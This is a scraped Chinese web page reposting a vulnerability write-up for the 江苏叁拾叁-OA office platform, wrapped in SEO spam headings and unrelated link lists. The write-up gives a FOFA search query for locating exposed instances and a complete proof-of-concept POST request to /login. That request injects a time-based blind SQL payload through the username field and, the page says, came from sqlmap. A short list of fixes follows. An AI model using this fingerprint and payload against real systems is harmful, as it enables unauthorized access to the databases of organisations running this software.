当前位置: 首页 > news >正文

企业网站怎么自适应营销客户管理系统

企业网站怎么自适应,营销客户管理系统,中国会出兵吗,长春新增2个高风险地区0x01 漏洞介绍 江苏叁拾叁-OA是由江苏叁拾叁信息技术有限公司开发的一款OA办公平台,主要有知识管理,工作流程,沟通交流,辅助办公,集成解决方案,应用支撑平台,基础支撑等功能。 该系统也与江苏叁…

0x01 漏洞介绍


江苏叁拾叁-OA是由江苏叁拾叁信息技术有限公司开发的一款OA办公平台,主要有知识管理,工作流程,沟通交流,辅助办公,集成解决方案,应用支撑平台,基础支撑等功能。 该系统也与江苏叁拾叁智慧农业研究院的农产品电商解决方案、社会化服务解决方案、乡村振兴解决方案等进行了深度融合。该漏洞存在于login下,username对接受的传参没有进行严格的过滤,从而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。


0x02 影响版本

  1. 江苏叁拾叁-OA

0x03 语法特征

  1. app="江苏叁拾叁-OA"

0x04 漏洞复现


页面
 


POC(payload sqlmap梭哈来的)

POST /login HTTP/1.1
Host:
Content-Length: 93
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: closeusername=admin' AND (SELECT 9415 FROM (SELECT(SLEEP(4)))QBMI) AND 'AUxO'='AUxO&password=admin


直接sqlmap梭哈来
 


0x05 漏洞修复建议

  1. 使用参数化查询
  2. 对用户输入进行验证和过滤
  3. 限制数据库账户权限
  4. 更新和打补丁
http://www.mmbaike.com/news/51634.html

相关文章:

  • 如何建立网站快捷方式到桌面做百度推广销售怎么找客户
  • 一元购网站建设网络销售平台排名
  • 邢台手机网站制作app拉新推广项目
  • 网站建设报价方案对比2023近期舆情热点事件
  • 建晨网站建设网络营销logo
  • java网站开发 流程kol推广
  • 网站开发设置用户seo优化排名工具
  • 大丰网站建设关键词推广和定向推广
  • 什么程序做的网站没有index页面广州网站优化多少钱
  • 状元村建设官方网站网络热词
  • html静态网页制作案例百度关键词seo外包
  • 网站建设广州天河培训班有哪些课程
  • 做几个网站好广州疫情最新情况
  • 手机开发网站教程网络营销考试题目及答案2022
  • 做网站会什么问题大连seo关键词排名
  • wordpress怎么搬站宣传推广计划怎么写
  • 万网建网站流程信息流广告代运营
  • 设计电子商务网站建设方案产品seo基础优化
  • 南京培训网站建设独立站怎么建站
  • 新鸿儒做网站app排名优化公司
  • 网站备案 换域名一个关键词要刷多久
  • 3d建模素材seo排名优化什么意思
  • 网站建设公司南宁网站服务器查询
  • 六安手机网站建设站长之家排行榜
  • 有哪些做包装设计网站好些网络营销推广策划书
  • php做的网站如何发布微信推广链接怎么制作
  • php多版本共存wordpressseo3
  • 网站风格设计合肥百度seo代理
  • 网站制作成本多少钱域名信息查询系统
  • 龙岩网站建设要多网络推广引流有哪些渠道